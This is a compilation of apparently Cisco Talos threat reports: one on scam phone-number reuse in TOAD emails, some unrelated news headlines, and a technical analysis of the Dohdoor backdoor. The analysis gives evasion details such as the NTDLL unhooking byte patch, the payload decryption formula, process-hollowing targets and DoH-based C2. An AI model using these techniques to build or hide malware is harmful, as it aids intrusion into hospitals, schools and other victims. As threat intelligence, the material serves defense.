• Cisco Talos has recently started to collect and gather intelligence around phone numbers within emails as an additional indicator of compromise (IOC). In this blog, we discuss new insights into in-the-wild phone number reuse in scam emails.  
• According to Talos’ observations, the ease of API-driven provisioning makes a few VoIP providers the preferred tool for attackers, allowing for high-volume, cost-effective scam operations that are difficult to trace. 
• Attackers maintain operational continuity by rotating through sequential blocks of phone numbers and utilizing strategic cool-down periods, with a median phone number lifespan of 14 days, to effectively evade reputation-based security filters. 
• Threat actors try to maximize their reach by recycling the same phone numbers across diverse, seemingly unrelated lures - including varied subject lines and different attachment formats like HEIC and PDF - to impersonate multiple brands simultaneously. 
• Security researchers can expose the hidden infrastructure of organized scam call centers by shifting focus from ephemeral email addresses to phone numbers, using clustering techniques to connect disparate campaigns and strengthen overall defensive postures.

Telephone-oriented attack delivery (TOAD) continues to be a prevalent tactic in modern email threats. By shifting the communication channel from email to a real-time conversation, attackers manipulate victims into disclosing sensitive information or installing malicious software. 

Cisco Talos has expanded its threat intelligence capabilities to include phone numbers as a critical IOC. Our analysis covers a wide spectrum of line types, including wireless (cellular), landline, and Voice over Internet Protocol (VoIP). While scammers leverage all three, VoIP numbers are particularly prevalent due to their ease of acquisition and the difficulty of tracing them back to their origin. In fact, six of the ten largest campaigns we detected between February 26 and March 31, 2026 relied on VoIP infrastructure.

To better understand how these numbers are weaponized, this blog first explains the technical structure of VoIP numbers and the role of service providers in this ecosystem. We then broaden the scope to analyze reuse patterns, lifespan, and campaign characteristics across all line types. By sharing these insights, Talos aims to strengthen our collective defensive posture against these evolving threats.

The structure of VoIP phone numbers 

Most VoIP numbers follow the E.164 international public telecommunication numbering plan. This format ensures that every number is globally unique and can be routed correctly across the Public Switched Telephone Network (PSTN). 

An E.164 number is limited to 15 digits and consists of: 

1. International Prefix (+): Indicates the number is in international format 
2. Country Code (CC): 1 to 3 digits (e.g., 1 for the US/Canada, 44 for the UK) 
3. Area Code/National Destination Code (NDC): Often referred to as the area code 
4. Subscriber Number (SN): The specific number assigned to the user or device 

The above components are shown in the example phone number below:

The VoIP ecosystem 

Voice over Internet Protocol (VoIP) has become the primary medium for scam campaigns due to its cost effectiveness, ease of deployment, and API-driven automation. Within this ecosystem, we identify two primary operational models: wholesalers and retailers. VoIP wholesalers (e.g., Virtue, Twilio, and Bandwidth) operate in a business-to-business (B2B) capacity, sitting between Tier 1 carriers (e.g., AT&T, Verizon) and smaller service providers, selling high volumes of numbers in bulk. Conversely, VoIP retailers (e.g., RingCentral) sell finished business calling and collaboration solutions directly to organizations and end users. 

VoIP providers are further categorized into communications platform as a service (CPaaS) and unified communications as a service (UCaaS). CPaaS providers offer programmable APIs that allow developers to integrate voice and messaging directly into applications. Because these platforms are designed for automation and high-volume traffic, they are frequently exploited by threat actors for rapid, API-driven number provisioning. In contrast, UCaaS providers offer comprehensive, end-user-facing communication suites. UCaaS platforms are typically designed for legitimate enterprise collaboration, and that makes them less attractive for scam email campaigns. Talos has found Sinch (primarily a leader in CPaaS) as the most commonly abused VoIP provider, and Verizon and NUSO as the least abused providers in the studied time window.

While VoIP line types dominate the scam landscape (see Figure 2), Talos has observed that threat actors utilize wireless (cellular) and landline numbers as well. Cellular numbers are harder to provision at scale, as they typically require physical SIM cards and stricter customer verification, making them more expensive and less disposable than VoIP numbers. Nevertheless, they are still widely adopted by scammers. Figure 3 shows the distribution of wireless carriers that are used byscammers in the studied time window. Landline numbers, on the other hand, are used to project a sense of local presence or established business legitimacy. By using a landline with a specific local area code, scammers can effectively impersonate local businesses (e.g., banks, utility companies, or government offices).

Phone number reuse and lifespan in scam campaigns 

In this section, we provide insights into the lifecycle of phone numbers used in scam emails, examining how often they are reused, their typical lifespan, and how they appear across seemingly unrelated lures. Our analysis focuses on scam campaigns impersonating popular brands, including PayPal, Geek Squad (Best Buy), McAfee, and Norton LifeLock. 

Phone number reuse patterns 

Talos identified 1,652 unique phone numbers across these campaigns during the studied time window (February 26 to March 31). Of these, 57 numbers (approximately 3.4%) were reused across multiple consecutive days. The longest period of reuse observed for a single phone number was four consecutive days. 

As discussed in a previous blog post, phone numbers are reused for several strategic reasons. First, intelligence regarding phone numbers is often distributed more slowly than that of URLs or file hashes; many numbers remain under the radar of third-party reputation services for several days. Second, reuse offers logistical advantages for scam call centers, allowing them to maintain a consistent brand presence for multi-stage social engineering, callback scheduling, and persistent victim engagement. Finally, reuse minimizes operational costs, particularly for paid VoIP services. While we observed some phone numbers reused for up to four consecutive days, the most common reuse period was two consecutive days.

Lifespan analysis and cool-down periods 

Scammers do not always reuse phone numbers on consecutive days. Often, they implement a cool-down period — pausing the use of a number for a few days to evade detection — before reintroducing it into a campaign. 

Our investigation into the lifespan of these numbers revealed that 108 phone numbers (~6.5%) remained active for more than one day. As shown in Figure 4, most phone numbers have a lifespan of two to six days, though a handful remained active for nearly a month. During the study window, the median lifespan was approximately 14 days. Notably, infrastructure longevity often correlates with the impersonated brand; as illustrated in Figure 5, PayPal-themed scam campaigns utilized significantly more persistent phone numbers than those impersonating Norton LifeLock.

Phone numbers across unrelated lures 

A scam or phishing lure is typically a combination of a business context, a psychological trigger, a call-to-action, and an impersonated brand (see Table 1 for a few examples). These lures appear across various email layers, including subject lines, body content, and attachments.

Table 1. Examples of lures that most commonly appear in scam or phishing emails.

We observed phone numbers being recycled across diverse, seemingly unrelated lures: 

• Using the same phone number across multiple lures in the subject line: In one campaign, a single phone number appeared across multiple business contexts, such as "order confirmation" and "financial transaction verification." Figure 6 demonstrates how these subject lines differ, despite the emails containing the same phone number and impersonating the same brand.

• Using the same phone number across multiple document-based lures: In a second campaign, a single phone number was embedded in PDF attachments used for both “subscription renewal” and “financial transaction verification.”Interestingly, this campaign utilized two different brands — PayPal and Norton LifeLock — to redirect recipients to the same call center, leveraging urgency as a psychological trigger.

• Using the same phone number across multiple attachment file formats: In a third campaign, a single phone number was embedded in two different attachment formats: HEIC and JPEG. The use of HEIC (High Efficiency Image Container) — a format often used for iPhone/iPad photos — demonstrates the attackers' efforts to bypass traditional file-based detection while maintaining high image quality. Talos has observed campaigns utilizing even more attachment types, confirming that threat actors frequently distribute a single phone number across multiple attack vectors to maximize their reach.

Phone block-level clustering 

In the context of scam emails and related smishing or callback scams, attackers utilize specific VoIP grouping and clustering techniques to bypass security filters, appear legitimate, and maintain high-volume operations. One of the most common tactics is sequential number grouping. Scammers often obtain large ranges of sequential phone numbers by purchasing Direct Inward Dialing (DID) blocks. Consequently, if a specific number is flagged as spam and blocked by a carrier, the attackers simply rotate to the next number in the block. 

The figure below shows how a block of numbers — differing only in the last four digits — is used in various scam emails impersonating PayPal between March 3 and March 6, 2026. It is also clear that certain numbers are used in larger campaigns than others; for instance, “+1 804[-]713[-]4598” was used in 117 scam emails in a single day.

In large-scale scam campaigns, phone numbers within a single sequential block are reused across multiple brand lures. The figure below shows how a range of numbers in a sequential block is deployed across three different brand lures. As with the previous case, some phone numbers are utilized in significantly larger campaign volumes than others.

Conclusion and protection 

When tracking scam campaigns, it is essential to look beyond individual sender email addresses, which are often ephemeral. Instead, it is more strategic to focus on phone numbers, which serve as the true anchors of the operation. By clustering scam lures based on shared phone numbers, security researchers can effectively map connections between seemingly unrelated campaigns, ultimately exposing the infrastructure of organized criminal call centers. 

Service providers and security teams should prioritize the implementation of real-time reputation monitoring for different communication channels to proactively mitigate these threats. For example, establishing centralized databases that track and flag high-risk phone numbers across multiple platforms allows for rapid cross-campaign correlation. Collaboration between telecommunications and VoIP providers is also vital, as sharing threat intelligence regarding malicious telephony infrastructure enables an industry-wide defense against the persistent threat of social engineering and fraud. 

Cisco Secure Email Threat Defense 

Protecting against these sophisticated and devious threats requires a comprehensive email security solution that harnesses AI-powered detections. Cisco Secure Email Threat Defense utilizes unique deep and machine learning models, including Natural Language Processing, in its advanced threat detection systems that leverage multiple engines. These simultaneously evaluate different portions of an incoming email to uncover known, emerging, and targeted threats.

Secure Email Threat Defense identifies malicious techniques used in attacks targeting your organization, derives unparalleled context for specific business risks, provides searchable threat telemetry, and categorizes threats to understand which parts of your organization are most vulnerable to attack. You can sign up for a free trial of Email Threat Defense today. 

The post Beyond Stuxnet: Uncovering fast16, the Apex Saboteur That Rewrites Mathematical Reality appeared first on Daily CyberSecurity.

The post The 32GB Ceiling Shatters: Microsoft Finally Ends the “Arbitrary” FAT32 Limit After 30 Years appeared first on Daily CyberSecurity.

The post The Invisible Patch: How PolinRider Rewrites Git History to Hide North Korean Malware appeared first on Daily CyberSecurity.

The post End of an Era: Linux Kernel 7.1 Finally Bids Farewell to the Iconic Intel 486 appeared first on Daily CyberSecurity.

The post No More Starting Over: How to Move Your ChatGPT and Claude “Memories” to Google Gemini appeared first on Daily CyberSecurity.

The post The End of an Era: Apple Formally Retires the Mac Pro to Crown Mac Studio the New King of Performance appeared first on Daily CyberSecurity.

• Cisco Talos discovered an ongoing malicious campaign since at least as early as December 2025 by a threat actor we track as “UAT-10027,” delivering a previously undisclosed backdoor dubbed “Dohdoor.” 
• Dohdoor utilizes the DNS-over-HTTPS (DoH) technique for command-and-control (C2) communications and has the ability to download and execute other payload binaries reflectively. 
• UAT-10027 targeted victims in the education and health care sectors in the United States through a multi-stage attack chain. 
• Talos observed the actor misused various living-off-the-land executables (LOLBins) to sideload the Dohdoor and has set up the C2 infrastructure behind reputable cloud services, such as Cloudflare, to enable stealth C2 communication.

Multi-stage attack chain  

Talos discovered a multi-stage attack campaign targeting the victims in education and health care sectors, predominantly in the United States.  

The campaign involves a multi-stage attack chain, where initial access is likely achieved through social engineering phishing techniques. The infection chain executes a PowerShell script that downloads and runs a Windows batch script from a remote staging server through a URL. Subsequently, the batch script facilitates the download of a malicious Windows dynamic-link library (DLL), which is disguised as a legitimate Windows DLL file. The batch script then executes the malicious DLL dubbed as Dohdoor, by sideloading it to a legitimate Windows executable. Once activated, the Dohdoor employs the DNS-over-HTTPS (DoH) technique to resolve command-and-control (C2) domains within Cloudflare’s DNS service. Utilizing the resolved IP address, it establishes an HTTPS tunnel to communicate with the Cloudflare edge network, which effectively serves as a front for the concealed C2 infrastructure. Dohdoor subsequently creates backdoored access into the victim's environment, enabling the threat actor to download the next-stage payload directly into the victim machine's memory and execute the potential Cobalt Strike Beacon payload, reflectively within legitimate Windows processes. 

In this campaign, the threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address. This obfuscation is further reinforced by utilizing subdomain names such as “MswInSofTUpDloAd” and “DEEPinSPeCTioNsyStEM”, which mimic Microsoft Windows software updates or a security appliance check-in to evade automated detections. Additionally, employing irregular capitalization across non-traditional Top-Level Domains (TLD) like “.OnLiNe”, “.DeSigN”, and “.SoFTWARe” not only bypasses string matching filters but also aids in adversarial infrastructure redundancy by preventing a single blocklist entry from neutralizing their intrusion.

PowerShell downloader

Talos discovered suspicious download activity in our telemetry where the threat actor executed “curl.exe” with an encoded URL, downloading a malicious Windows batch file with the file extensions “.bat” or “.cmd”.   

While the initial infection vector remains unknown, we observed several PowerShell scripts in OSINT data containing embedded download URLs similar to those identified in the telemetry. The threat actor appeared to have executed the download command via a PowerShell script that was potentially delivered to the victim through a phishing email. 

Windows batch script and anti-forensics  

The second stage component of the attack chain is a Windows batch script dropper that effectively orchestrates a DLL sideloading technique to execute the malicious DLL while simultaneously conducting anti-forensic cleanup. 

This process initiates by creating a hidden workspace folder in either “C:\ProgramData” or the “C:\Users\Public” folder. It then downloads a malicious DLL from the command-and-control server using the URL /111111?sub=d, placing it into the workspace, disguising it as legitimate Windows DLL file name, such as "propsys.dll” or “batmeter.dll”. The script subsequently copies legitimate Windows executables, such as “Fondue.exe”, “mblctr.exe”, and “ScreenClippingHost.exe”, into the working folder and executes these programs from the working folder, using the C2 URL /111111?sub=s as the argument parameter. The legitimate executable sideloads and runs the malicious DLL. Finally, the script performs anti-forensics by deleting the Run command history from the RunMRU registry key, clearing the clipboard data, and ultimately deleting itself.  

Dohdoor potentially runs the payload reflectively  

UAT-10027 downloaded and executed a malicious DLL using the DLL sideloading technique. The malicious DLL operates as a loader, which we call “Dohdoor,” and it is designed to download, decrypt, and execute malicious payloads within legitimate Windows processes. It evades detection through API obfuscation and encrypted C2 communications, and bypasses endpoint detection and response (EDR) detections.  

Dohdoor is a 64-bit DLL that was compiled on Nov. 25, 2025, containing the debug string "C:\Users\diablo\Desktop\SimpleDll\TlsClient.hpp". Dohdoor begins execution by dynamically resolving Windows API functions using hash-based lookups rather than using static imports, evading the signature-based detections from identifying the malware Import Address Table (IAT). Dohdoor then parses command line arguments that the actor has passed during the execution of the legitimate Windows executable which sideloads the Dohdoor. It extracts an HTTPS URL pointing to the C2 server, and a resource path specifying the type of payload to download.  

Dohdoor employs stealthy domain resolution utilizing the DNS-over-HTTPS technique to effectively resolve the C2 server IP address. Rather than generating plaintext DNS queries, it securely sends encrypted DNS requests to Cloudflare’s DNS server over HTTPS port 443. It constructs DNS queries for both IPv4 (A records) and IPv6 (AAAA records) and formats them using the template strings that include the HTTP header parameters such as User-Agent: insomnia/11.3.0 and Accept: applications/dns-json, producing a complete HTTP GET request. 

The formatted HTTP request is sent through encrypted connections. After receiving the JSON response of the Cloudflare DNS servers, it parses them by searching for specific patterns rather than using a full JSON parser. It searches for the string “Answer” to locate the answer section of the response, and if found, it will search for the string “data” to locate the data field containing the IP address.  

This technique bypasses DNS-based detection systems, DNS sinkholes, and network traffic analysis tools that monitor suspicious domain lookups, ensuring that the malware's C2 communications remain stealth by traditional network security infrastructure.  

With the resolved IP address, Dohdoor establishes a secure connection to the C2 server by constructing the GET requests with the HTTP headers including “User-agent: curl/7.88” or “curl/7.83.1” and the URL /X111111?sub=s. It supports both standard HTTP responses with Content-length headers and chunked encoding. 

Dohdoor receives an encrypted payload from the C2 server. The encrypted payload undergoes custom XOR-SUB decryption using a position-dependent cipher. The encrypted data maintains a 4:1 expansion ratio where the encrypted data is four times larger than the decrypted data. The decryption routine of Dohdoor operates in two ways. A vectorized (Single Instruction, Multiple Data) SIMD method for bulk processing and a simpler loop to handle the remaining encrypted data.  

The main decryption routine processes 16-byte blocks of the encrypted data using the SIMD instructions. It calculates position-dependent indexes, retrieves encrypted data and applies XOR-SUB decryption using the 32-byte key. This decryption routine repeats four times per iteration until it reaches the end of a 16-byte block.  

For the encrypted data that remains out of the 16-byte blocks, it applies to the decryption formula “decrypted[i] = encrypted[i*4] - i – 0x26”. Every fourth byte is sampled from the encryption data buffer; the position index is subtracted to create position-dependent decryption, and finally the constant 0x26 is subtracted.  

Once the payload is decrypted, Dohdoor injects the payload binary into a legitimate Windows process utilizing process hollowing technique. The actor targets legitimate Windows binaries by hardcoding the executable paths, ensuring that Dohdoor executes them in a suspended state. It then performs process hollowing, seamlessly injecting the decrypted payload before resuming the process, allowing the payload to run stealthily and effectively. In this campaign, the legitimate Windows binaries targeted for process hollowing are listed below: 

• C:\Windows\System32\OpenWith.exe 
• C:\Windows\System32\wksprt.exe 
• C:\Program Files\Windows Photo Viewer\ImagingDevices.exe 
• C:\Program Files\Windows Mail\wab.exe 

Talos observed that the Dohdoor implements an EDR bypass technique by unhooking system calls (syscalls) to bypass EDR products that monitor Windows API calls through user mode hooks in ntdll.dll. Security products usually patch the beginning of ntdllfunctions to redirect execution through their monitoring code before allowing the original system call to execute. 

Evasive malwares usually detect system call hooks by reading the first bytes of critical ntdll functions and comparing them against the expected syscall stub pattern that begins with "mov r10, rcx; mov eax, syscall_number". If the bytes match the expected pattern indicating the function is not hooked, or if hooks are detected, the malware can write replacement code that either restores the original instructions or creates a direct syscall trampoline that bypasses the hooked function entirely. 

Dohdoor achieves this by locating ntdll.dll with the hash “0x28cc” and finds NtProtectVirtualMemory with the hash “0xbc46c894”. Then it reads the first 32 bytes of the function using ReadProcessMemory that dynamically loads during the execution and compares them with the syscall stub pattern in hexadecimal “4C 8B D1 B8 FF 00 00 00” which corresponds to the assembly instructions “mov r10, rcx; mov eax, 0FFh”. If the byte pattern matches, it writes a 6-byte patch in hexadecimal “B8 BB 00 00 00 C3” which corresponds to assembly instruction “mov eax, 0BBh; ret”, resulting in creating a direct syscall stub that bypasses any user mode hooks.  

During our research, we were unable to find a payload that was downloaded and implanted by the Dohdoor. Still, we found that one of the C2 hosts associated with this campaign had a JA3S hash of “466556e923186364e82cbdb4cad8df2c” and the TLS certificate serial number “7FF31977972C224A76155D13B6D685E3” according to the OSINT data. The JA3S hash and the serial number found resembles the JA3S hash of the default Cobalt Strike server, indicating that the threat actor was potentially using the Cobalt Strike beacon as the payload to establish persistent connection to the victim network and execute further payloads.   

Low confidence TTPs overlap with North Korean actors’ techniques 

Talos assesses with low confidence that UAT-10027 is North Korea-nexus, based on the similarities in the tactics, techniques, and procedures (TTPs) with that of the other known North Korean APT actor Lazarus.  

We observed similarities in the technical characteristics of Dohdoor with Lazarloader, a tool belonging to the North Korean APT Lazarus. The key similarity noted is the usage of a custom XOR-SUB with the position-dependent decryption technique and the specific constant in hexadecimal (0x26) for subtraction operation. Additionally, the NTDLL unhooking technique used to bypass EDR monitoring by identifying and restoring system call stubs aligns with features found in earlier Lazarloader variants. 

The implementation of DNS-over-HTTPS (DoH) via Cloudflare’s DNS service to circumvent traditional DNS security, along with the process hollowing technique to reflectively execute the decrypted payload in targeted legitimate Windows binaries like ImagingDevices.exe, and the sideloading of malicious DLLs in disguised file name “propsys.dll”, were observed in the tradecraft of the North Korean APT actor Lazarus. 

In addition to the observed technical characteristics similarities of the tools, the use of multiple top-level domains (TLDs) including “.design”, “. software”, and “. online”, with varying case patterns, also aligns with the operational preferences of Lazarus. While UAT-10027's malware shares technical overlaps with the Lazarus Group, the campaign’s focus on the education and health care sectors deviates from Lazarus’ typical profile of cryptocurrency and defense targeting. However, Talos has historically seen that North Korean APT actors have targeted the health care sector using Maui ransomware, and another North Korean APT group, Kimsuky, has targeted the education sector, highlighting the overlaps in the victimology of UAT-10027 with that of other North Korean APTs. 

Coverage

The following ClamAV signature detects and blocks this threat: 

• Win.Loader.Dohdoor-10059347-0 
• Win.Loader.Dohdoor-10059535-0 
• Ps1.Loader.Dohdoor-10059533-0 
• Ps1.Loader.Dohdoor-10059534-0 

The following SNORT® Rules (SIDs) detect and block this threat: 

• Snort2 – 65950, 65951, 65949
• Snort3 – 301407, 65949

Indicators of compromise (IOCs) 

The IOCs for this threat are also available at our GitHub repository here.